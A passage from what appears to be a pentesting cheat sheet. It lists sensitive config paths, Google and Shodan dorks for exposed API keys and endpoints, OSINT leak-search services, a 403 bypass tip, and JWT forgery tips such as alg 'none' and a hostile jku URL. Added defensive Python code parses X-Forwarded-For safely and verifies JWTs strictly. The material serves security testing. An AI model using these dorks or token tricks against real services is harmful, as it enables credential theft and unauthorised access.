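locked:!:19000:0:99999:7:::
nologin:*:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, verdict in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user:8} {verdict}")
```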
- Headers:
- X-Forwarded-For (XFF) is an HTTP header used to identify the original IP address of a client connecting to a web server through an HTTP proxy or load balancer. By reading this header, the server can log and track the original client's IP address instead of the proxy's or load balancer's IP. Because the client can set the header itself, only the entries appended by your own proxies can be trusted.
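How a server should read that header is the part that matters for logging and rate limiting. The following is an added Python example (not from this page) of the safe interpretation: X-Forwarded-For is only honoured when the TCP peer is one of our own proxies, and the chain is walked from the right so that values the client chose to send on the left are ignored. The trusted proxy ranges and the addresses in the demo are assumptions constructed for the example.

```python
import ipaddress
from typing import Iterable, List, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def _parse_networks(cidrs: Iterable[str]) -> List[Network]:
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def client_ip(remote_addr: str, xff: str, trusted_proxy_cidrs: Iterable[str]) -> str:
    """Return the client address to log and rate-limit on.

    remote_addr is the TCP peer and the only address known for sure. Each trusted proxy
    appends the address it saw to X-Forwarded-For, so the rightmost entry that is not one
    of our proxies is the real client; anything left of it is client-supplied text.
    """
    trusted = _parse_networks(trusted_proxy_cidrs)

    def is_trusted(addr) -> bool:
        return any(addr in net for net in trusted)

    peer = ipaddress.ip_address(remote_addr)
    if not is_trusted(peer):
        return str(peer)          # direct connection: the header is ignored entirely
    hops = [h.strip() for h in xff.split(",") if h.strip()] if xff else []
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)      # malformed hop: do not guess, fall back to the peer
        if not is_trusted(addr):
            return str(addr)
    return str(peer)              # header absent, or only our own proxies listed


if __name__ == "__main__":
    # Constructed scenarios: 10.0.0.0/8 is the (assumed) proxy tier.
    trusted = ["10.0.0.0/8"]
    print(client_ip("203.0.113.10", "1.2.3.4", trusted))                       # direct: 203.0.113.10
    print(client_ip("10.0.0.5", "1.2.3.4, 198.51.100.7, 10.0.0.9", trusted))   # via proxies: 198.51.100.7
```

The first demo call shows the spoofing case: a direct client sending `X-Forwarded-For: 1.2.3.4` still gets logged as its real peer address. A naive `split(",")[0]` would have logged 1.2.3.4 in both calls.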
- Virtual Box:
- How to enable Nested VT-x in Windows:
cd C:\Program Files\Oracle\VirtualBox
VBoxManage.exe list vms
VBoxManage.exe modifyvm "<NAME_OF_MACHINE>" --nested-hw-virt on
- Configuration files:
- /.htaccess
- /.htpasswd
- /web.config
- /.git/config
- /nginx.conf
- /server-status
- /status
- /cgi-bin/php.ini
- Secure your machine!
- Tallow. Routes all traffic through Tor
- Safing Portmaster. Your firewall
- mat2. Tool that removes metadata from files
- Unified Kill Chain
1. Reconnaissance (MITRE Tactic TA0043)
2. Weaponization (MITRE Tactic TA0001)
3. Social Engineering (MITRE Tactic TA0001)
4. Exploitation (MITRE Tactic TA0002)
5. Persistence (MITRE Tactic TA0003)
6. Defence Evasion (MITRE Tactic TA0005)
7. Command & Control (MITRE Tactic TA0011)
8. Pivoting (MITRE Tactic TA0008)
- Jenkins endpoints.
- /signup
- /jenkins/signup
- 403 Bypass
- Try to change method to PATCH and add header
Accept: application/json
GPTs (Agents) for Cybersecurity
- MagicUnprotect - allows interacting with the Unprotect knowledge base on malware evasion techniques
- Threat Intel Bot - GPT agent for retrieving the latest data on APT groups
- Hacker News GPT - summarizes the most relevant and discussed Hacker News articles
- ATT&CK Mate - get any answer about the ATT&CK knowledge base
- Smart Contract Audit Assistant - a high-precision tool for auditing smart contracts
- AlphaHoundAI - expert in BloodHound CE, Cypher, SharpHound, and related tools
- zkGPT - if you want to master cryptography, use this agent
- OSISTent - will assist you in solving various OSINT tasks and research
- Bug Bounty Assistant - a guide for web application security
- Full List
OSINT
- Tools for searching data by email and logins
Snusbase indexes information from leaks and provides access to searching compromised email addresses, logins, names, IP addresses, phone numbers, and password hashes
Have I Been Pwned? is a data breach search engine. It allows you to check which incidents a specific email address has been involved in
Hunter and Skymem - search for corporate email addresses by URL
Whatsmyname - searches for accounts on various services by username. The service is based on publicly available JSON
User Searcher - a free tool that helps find users by login on over 2,000 websites
CheckUserNames, Instant, Namecheckr, Peekyou, Usersearch - online services for searching user accounts by username
API
Tools
- Burp Extensions - Autorize, Param Miner
- Postman. Like Burp but for API requests
- JWT_Tool
- Kiterunner
- Arjun. For params fuzzing
- Rested (FireFox extension) - Quick request sender. Useful with APIs
Tips
- Wordlists:
- Try to:
- Check the JS files to find api endpoints
- Change methods
- If BFLA doesn't let you see one record, try to get all of them (/users instead of /user/1)
- Check numbers of version (for example v0, v1, v2, v3, v4 etc)
- Fuzz parameters and/or query
- Remove Bearer from the Authorization header (Authorization: <JWT>)
- Endpoints:
- https://target.domain/api
- https://target.domain/v1, https://target.domain/v2 etc
- https://target.domain/api/v1, https://target.domain/api/v2 etc
- https://target.domain/swagger
- https://target.domain/docs
- https://target.domain/rest
- https://api.target.domain
- https://target.com/docs
- https://dev.target.com/rest
- https://dev.target.com/playground
- https://dev.target.com/altair
- Google Dorking:
inurl:/api/admin site:target.com
inurl:"/wp-json/wp/v2/users"
- Finds all publicly available WordPress API user directories
intitle:"index of" intext:"api"
intitle:"index.of" intext:"api.txt"
- Finds publicly available API key files
inurl:"/api/*" intext:"index of"
- Finds potentially interesting API directories
ext:php inurl:"api.php?action="
- Finds all sites with a XenAPI SQL injection vulnerability
intext:api filetype:env
intitle:"index of" api_key OR "api key" OR apiKey -pool
- Lists potentially exposed API keys
intext:APIKey ext:js | xml | yaml | txt | conf | py intitle:"index of"
intitle:"index of" "api.yaml"
"api" ext:log
- Git Dorking:
- filename:swagger.json
- extension:.json
- search for "api key", "api keys", "apikey", "authorization: Bearer", "access_token", "secret" or "token"
- Shodan:
port:80,443 http.status:200 "Content-Type: application/json"
"Content-Type: application/xml"
- Find web servers returning potential endpoints that use XML (i.e. SOAP)
"Content-Type: application/json"
- Find web servers returning potential endpoints that use JSON
"wp-json"
- This will search for web applications using the WordPress API
"X-*API*" hostname:"*.target.domain"
- Find servers that contain custom headers related to "API", e.g. X-API-KEY, X-API-VERSION, X-API-ENV, X-AMZ-API-PATH etc.
ssl.cert.subject.cn:target.domain
- Find servers which have been issued an SSL cert for *.target.domain
ssl:"<Company Name>"
- Find servers which have been issued an SSL cert relating to the company you are targeting. Useful for certs generated by SaaS/cloud vendors offering services to the target (i.e. AWS, Azure, Google, etc.). This typically finds entries in the Issued To organization fields.
- Some resources:
seclists/Discovery/Web-Content/api/
seclists/Discovery/Web-Content/api/objects.txt
seclists/Discovery/Web-Content/api/actions.txt
seclists/Discovery/Web-Content/swagger.txt
seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt
GraphQL
- Tools
- Altair GraphQL Client (desktop, FireFox, Chrome)
- Clairvoyance. Obtain GraphQL API schema even if the introspection is disabled
- InQL (github, burp) - GraphQL Scanner
- graphw00f - GraphQL Server Fingerprinting
- BatchQL - security auditing script
- graphql-path-enum is a tool that lists the different ways of reaching a given type in a GraphQL schema
- GraphQL Cop is a small Python utility to run common security tests against GraphQL APIs
- CrackQL is a versatile GraphQL penetration testing tool that exploits poor rate-limit and cost analysis controls to brute-force credentials and fuzz operations
- graphql-voyager. Upload an introspection result and browse the schema
- nmap-graphql-introspection-nse
- Wordlists:
/usr/share/wordlists/seclists/Discovery/Web-Content/api/
- common-graphql-endpoints.txt
- non-production-graphql-urls.txt
- Send the request to Repeater, then right-click > GraphQL > Set introspection query. This inserts an introspection query into the request body, revealing much more of the GraphQL schema tree to inspect and manipulate
- Endpoints:
- /graphql
- /graphiql
- /api
- /api/graphql
- /graphql/api
- /graphql?debug=1
- /graphql/graphql
- If these common endpoints don't return a GraphQL response, you could also try appending /v1 to the path
WordPress
- Endpoints:
wp-json/wp/v2/users
JWT
Some tips:
- Great tool for working with JWTs - JWT_Tool
- Try simply changing the claims
- Try deleting the whole signature, or a couple of characters of it, and send the request
- Try to brute force the signing key
- Send the token without a signature and set "alg":"none" (or None, nOne, NONE). Try sending it with and without the trailing dot
- Try to use a JWK if the alg is asymmetric (RS256, ES256 etc.)
- If there is a jku header, try pointing it at your own URL serving a key
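Every tip above corresponds to a check a correct verifier performs. The following is an added Python example (stdlib only, not from this page or from JWT_Tool) of a strict HS256 verifier: the algorithm is pinned server-side rather than taken from the token's own header, so "alg":"none" in any capitalisation and algorithm-confusion headers are rejected; a missing or truncated signature fails before any comparison; jku/jwk/x5u/x5c headers are never honoured; and the HMAC is compared in constant time. mint_token only exists to build test inputs, including the unsigned form described in the tips; the key and claims are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional, Tuple

EXPECTED_ALG = "HS256"   # pinned by server configuration, never read from the token


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint_token(claims: Dict, key: bytes, alg: str = "HS256", sign: bool = True) -> str:
    """Build a compact JWT. alg and sign=False exist so tests can build malformed variants."""
    header = _b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    if not sign:
        return f"{header}.{payload}."          # unsigned form: empty third segment
    sig = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_token(token: str, key: bytes, now: Optional[float] = None) -> Tuple[bool, str, Dict]:
    """Return (accepted, reason, claims). Claims are only returned when accepted."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed: expected header.payload.signature", {}
    header_b64, payload_b64, sig_b64 = parts
    if not sig_b64:
        return False, "empty signature", {}
    try:
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:            # binascii.Error, UnicodeDecodeError, JSONDecodeError
        return False, "undecodable token", {}
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return False, "header and payload must be JSON objects", {}
    # Exact match against the pinned algorithm rejects none/None/NONE and any
    # attempt to switch the algorithm family.
    if header.get("alg") != EXPECTED_ALG:
        return False, "algorithm not allowed: %r" % (header.get("alg"),), {}
    # The key comes from server config only; key-location headers are never followed.
    if any(k in header for k in ("jku", "jwk", "x5u", "x5c")):
        return False, "key-location header present", {}
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return False, "bad signature", {}
    current = time.time() if now is None else now
    if "exp" in claims and current >= claims["exp"]:
        return False, "expired", {}
    return True, "ok", claims


if __name__ == "__main__":
    key = b"constructed-test-key"
    claims = {"sub": "alice", "role": "user", "exp": 2000000000}
    good = mint_token(claims, key)
    h, p, s = good.split(".")
    for label, tok in [
        ("valid", good),
        ("no signature", f"{h}.{p}."),
        ("alg none", mint_token(claims, key, alg="none", sign=False)),
        ("alg NONE, signed", mint_token(claims, key, alg="NONE")),
    ]:
        print(f"{label:18} -> {verify_token(tok, key, now=1700000000)[:2]}")
```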